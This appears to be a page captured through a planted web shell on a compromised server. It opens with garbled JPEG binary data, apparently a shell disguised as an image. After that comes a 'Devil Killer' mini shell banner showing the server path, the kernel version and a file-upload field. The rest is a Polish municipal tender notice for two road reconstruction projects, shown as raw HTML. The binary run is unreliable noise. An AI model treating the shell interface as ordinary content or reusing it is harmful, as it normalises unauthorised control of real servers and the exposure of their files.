JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170425/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170425/73404-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zlotnikikuj.ires.pl' target='_blank'>http://www.zlotnikikuj.ires.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 73404 - 2017
              z dnia 2017-04-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Złotniki Kujawskie: Zadanie 1 -  Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki Kujawskie etap II
Zadanie 2 - Modernizacja drogi gminnej  w m.Dąbrówka Kujawska - Krążkowo gm.Złotniki Kujawskie etap II  
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Złotniki Kujawskie, krajowy numer identyfikacyjny
              9235080800000, ul.
              ul. Powstańców Wielkopolskich 
              6,
              88180  
              Złotniki Kujawskie, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              52 35 17 160, e-mail
              a.taflinska@zlotnikikujawskie.pl, faks
              52 35 17 160 wew. 51.
              <br />
              Adres strony internetowej (URL): www.zlotnikikuj.ires.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zlotnikikuj.ires.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zlotnikikuj.ires.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty wykonawcy składają w formie pisemnej za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23listopada 2012r.  Prawo Pocztowe , osobiście lub za pośrednictwem posłańca.<br />
                Adres:
                <br />Urząd Gminy Złotniki Kujawskie ul. Powstańców Wielkopolskich 6 88-180 Złotniki Kujawskie Pokój nr 27 Sekretariat</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zadanie 1 -  Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki Kujawskie etap II
Zadanie 2 - Modernizacja drogi gminnej  w m.Dąbrówka Kujawska - Krążkowo gm.Złotniki Kujawskie etap II  
<br /><b>Numer referencyjny: </b>271.1.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.1.Zadanie 1- Przebudowa drogi gminnej w miejscowości Leszcze - Tuczno  gm.Złotniki   
                         Kujawskie etap II ( 1390,0 m)
Droga objęta zamówieniem stanowi drogę gminną nr 150114C oraz drogę gminną nr 150112C,  przedsięwzięcie etapu II polegać będzie na przebudowie drogi  na odcinku od  km 1+ 200 do km 2+ 590. Pas drogowy jest zmiennej szerokości pozwala  tylko na lokalizację jezdni szerokości 5,00 m oraz zmiennej szerokości pobocze gruntowe. Spływ wody deszczowej odbywa się powierzchniowo na przyległy teren. Zakres robót obejmuje:
  przebudowę konstrukcji jezdni o szerokości 5,00 m,
  budowę nawierzchni zjazdów  do posesji /pas drogowy/,
  powierzchniowe odwodnienie drogi na przyległy teren,
  usunięcie ewentualnych kolizji z istniejącym uzbrojeniem terenu,
  zakres zamówienia obejmuje wycinkę drzew. W związku z powyższym dłużyce zostają własnością   
     Zamawiającego. Dłużyce Wykonawca przekaże Zamawiającemu na teren działki w Mierzwinie.

Branża drogowa 
Roboty rozbiórkowe:
 rozebranie konstrukcji jezdni na włączeniu projektowanego odcinka do istniejących   
   nawierzchni asfaltowych,
 rozebranie istniejącej nawierzchni z tłucznia  gr. 10 20 cm.

Konstrukcja wzmocnienia nawierzchni jezdni:
 warstwa ścieralna z betonu asfaltowego AC 11S gr. 4cm,
 warstwa wiążąca AC 16 W gr. 4 cm,
 podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 mm  
   gr.20 cm,
 warstwa mrozoodporna z piasku gr.10 cm,
 stabilizacja gruntu cementem Rm=2,50 MPa gr. 15 cm,


Konstrukcja zjazdów indywidualnych:
 warstwa ścieralna AC 11 S gr. 4cm,
 warstwa wiążąca AC 16 W gr. 4cm,
 podbudowa z kruszywa łamanego stabilizowanego mechanicznie  o grubości 20 cm,
 warstwa odcinająca z piasku grubości 10 cm,
 profilowane i zagęszczone podłoże gruntowe.

Konstrukcja pobocza:
 tłuczeń kamienny gr.15 cm,
 warstwa odcinająca z piasku gr. 10 cm,
 profilowane i zagęszczone podłoże gruntowe.

Branża sanitarna
Projekt przewiduje odprowadzenie wód opadowych z nawierzchni drogi za pomocą spadków 
podłużnych i poprzecznych do istniejących rowów  oraz w pobocza z materiału przepuszczalnego i na teren przyległy w granicach pasa drogowego.

Czasowa organizacja ruchu   na czas wykonania przebudowy zostanie wprowadzone ograniczenie prędkości do 40 km/h, oznakowanie  zgodnie z Projektem Czasowej Organizacji Ruchu. 
Stała Organizacja Ruchu - zgodnie z Projektem Stałej Organizacji Ruchu 
Oznakowanie pionowe ;wymiana wszystkich istniejących znaków  na nowe oraz zaprojektowane zmiany oznakowania pionowego wynikające  z wprowadzonej nowej geometrii drogi, a tym samym konieczności dostosowania do niej oznakowania pionowego, szczegółowa  lokalizacja przedstawiona została w części rysunkowej.
Oznakowanie poziome; oznakowaniem poziomym objęto skrzyżowanie przedmiotowej drogi gminnej  z  drogą powiatową  nr 2512C w km 2+280.
Szczegółowe oznaczenie zgodnie z częścią rysunkową. Należy uwzględnić zmiany i uwagi  Starosty Inowrocławskiego do zatwierdzonego  projektu stałej organizacji ruchu przedstawione w załączeniu.

Szczegółowy zakres zamówienia  zawiera:
Projekt budowlano-wykonawczy, Projekt czasowej organizacji ruchu, Projekt stałej organizacji ruchu , Specyfikacja techniczna wykonania i odbioru robót, wymagania zawarte w specyfikacji istotnych warunków zamówienia (siwz), natomiast przedmiar robót jest  elementem pomocniczym.
Przedmiary robót stanowią dokumenty pomocnicze do wyceny zadania.
Załączniki do SIWZ:
	Projekt budowlano-wykonawczy 
	Projekt tymczasowej organizacji ruchu 
	Projekt stałej organizacji ruchu 
	Szczegółowa Specyfikacja Techniczna 
	Opinia geotechniczna
	Przedmiar robót 

	W cenie ofertowej należy uwzględnić wszystkie koszty związane z realizacją zadania.
	Obowiązuje wynagrodzenie ryczałtowe


1.2.Zadanie 2 - Modernizacja drogi gminnej w miejscowości Dąbrówka  Kujawska - Krążkowo, gm. Złotniki Kujawskie etap II (781,4 m)
  
Zakres zamówienia obejmuje:  

Droga objęta zamówieniem przebiega przez gminę Złotniki Kujawskie w woj. kujawsko-pomorskim i stanowi drogę gminną nr 150110C.Droga gminna  nr 150110C łączy drogę wojewódzką  nr 246  w miejscowości Dąbrówka Kujawska z drogą powiatową nr 1539C  w miejscowości Krążkowo. Odcinek drogi przewidziany do realizacji w II etapie rozpoczyna się od km 2+470  do km 3+251,4 .Pas drogowy jest zmiennej szerokości , pozwala tylko na lokalizację jezdni szerokości 5,00 m oraz zmiennej szerokości pobocze gruntowe.
Branża drogowa

Roboty rozbiórkowe - rozebranie konstrukcji jezdni na włączeniu projektowanego odcinka do istniejącej nawierzchni asfaltowej,

Konstrukcja wzmocnienia nawierzchni jezdni:
- warstwa ścieralna z betonu asfaltowego AC 11 S gr 4 cm,
- warstwa wiążąca  AC 16 W gr 4 cm,
- podbudowa pomocnicza z kruszywa łamanego stabilizowanego mechanicznie  0/31,5 mm  
  gr. 20 cm,
- warstwa mrozoodporna z piasku gr 10 cm,
- stabilizacja gruntu cementem Rm= 2,50 MPa gr 15 cm,

Konstrukcja zjazdów indywidualnych
- warstwa ścieralna AC 11 S gr 4 cm,
- warstwa wiążąca AC 16 W gr 4 cm,
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie o grubości 20 cm,
- warstwa odcinająca z piasku grubości 10 cm,
- profilowane i zagęszczone podłoże gruntowe

Konstrukcja pobocza
- tłuczeń kamienny gr 15 cm
- warstwa odcinająca z piasku gr 10 cm, 
- profilowane i zagęszczone podłoże gruntowe
Odwodnienie drogi odbywać się będzie powierzchniowo na przyległy teren.

Czasowa organizacja ruchu  obejmuje zakres od etapu I do IV  zgodnie z Projektem Czasowej Organizacji Ruchu 
Stała Organizacja Ruchu: wg Projektu stałej organizacji ruchu.
Organizacja ruchu
Przyjęta organizacja ruchu wynika wprost z zaprojektowanej geometrii drogi w projekcie budowlanym  branży drogowej, dla przedmiotowej inwestycji.  Uwzględnia istniejącą organizację ruchu na przebudowywanym odcinku drogi oraz istniejącą geometrię dróg sąsiadujących z zakresem opracowania, a także istniejącą organizację ruchu na obszarze przyległym do tego zakresu.
Oznakowanie pionowe 
Zaprojektowano wymianę wszystkich istniejących znaków na nowe oraz zaprojektowane zmiany oznakowania pionowego wynikają z wprowadzonej nowej geometrii drogi, a tym samym konieczności dostosowania do niej oznakowania pionowego. Szczegółowa lokalizacja została przedstawiana w części rysunkowej.
Oznakowanie poziome
Oznakowanie poziome przedstawione w niniejszym projekcie to oznakowanie
projektowane (docelowe), które powinno znajdować się na drogach wchodzących w zakres niniejszego opracowania po jego wprowadzeniu. W przypadku dobrej widoczności istniejącego oznakowanie poziomego  kolidującego z projektowanym oznakowaniem poziomym, istniejące oznakowanie należy usunąć tak, aby nie było wątpliwości, które oznakowanie jest obowiązujące.
Szczegółowa oznakowania poziomego została przedstawiana w części rysunkowej projektu stałej organizacji ruchu.

3.1.Szczegółowy zakres zamówienia  zawiera:
Szczegółowy zakres zamówienia zawiera dokumentacja projektowa  , specyfikacja techniczna wykonania i odbioru robót , wymagania zawarte w specyfikacji istotnych warunków zamówienia (siwz), natomiast przedmiar robót jest  jedynie elementem pomocniczym dla Wykonawcy.
Przedmiar robót stanowi jedynie dokument pomocniczy .
Załączniki do SIWZ:
 Przedmiar robót - Załączniki nr 9
 Dokumentacja projektowa   Załącznik nr 10
    a) Projekt budowlano-wykonawczy 
 Specyfikacja Techniczna Wykonania i Odbioru Robót (STWiOR)   Załącznik nr 11.
<br /><br /><b>II.5) Główny kod CPV: </b>45233000-9<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45111000-8,
                45233000-9,
                45233000-9,
                45233280-5,
                45233000-9,
                45231300-8,
                45233000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/08/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                zamawiający  nie określa żadnych warunków udziału w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                zamawiający  nie określa żadnych warunków udziału w tym zakresie,
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                         - warunek zostanie spełniony jeżeli Wykonawca wykaże, że  w okresie ostatnich pięciu lat przed 
           upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy - w tym 
           okresie,  wykonał należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończył:
           1) w zadaniu 1 -  co najmniej jedną robotę budowlaną obejmującą swym  zakresem     
               budowę lub  przebudowę  drogi o nawierzchni bitumicznej o długości co najmniej 0,8 km,
            2) w zadaniu nr 2 - co najmniej jedną robotę budowlaną obejmującą swym  zakresem     
               budowę lub  przebudowę  drogi o nawierzchni bitumicznej o długości co najmniej 0,5 km,

         - warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje osobami, które skieruje do  
           realizacji zamówienia, gwarantującymi właściwą jakość robót budowlanych,  o kwalifikacjach    
           zawodowych niezbędnych do wykonania zamówienia, nie mniejszych niż określone poniżej, tj.:
           w zadaniu nr 1, zadaniu nr 2   jedną osobą do kierowania budową (kierownika budowy)   posiadający   
             uprawnienia budowlane do kierowania robotami  budowlanymi w specjalności drogowej bez ograniczeń.
             Zamawiający dopuszcza pełnienie funkcji przez w/w osobę na obu zadaniach jednocześnie. 

Wymienione wyżej osoby odpowiedzialne za kierowanie budową winny posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (t. jedn. Dz. U. z 2015 r., poz. 290) i Rozporządzenia Ministra Infrastruktury Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. 2014 r. poz. 1278) lub inne odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy z dnia 7 lipca 1994r. Prawo Budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65). 

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,  
    jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku  
    podstaw  wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy,

2) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy   
    kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć  
    wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że  powiązania z innym  
    wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />
1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności
odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z
informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego według wzoru zamawiającego).

2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem    
    terminu składania ofert , a jeżeli okres   prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,  miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego według wzoru zamawiającego), z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności  informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i  prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty;
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Formularz ofertowy wypełniony i podpisany z wykorzystaniem wzoru - Załącznik nr 1
2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu   - Załącznik nr2
   (wypełnione i podpisane przez Wykonawcę )
3) Oświadczenie o nie podleganiu wykluczeniu - Załącznik nr 3(wypełnione i podpisane przez Wykonawcę )
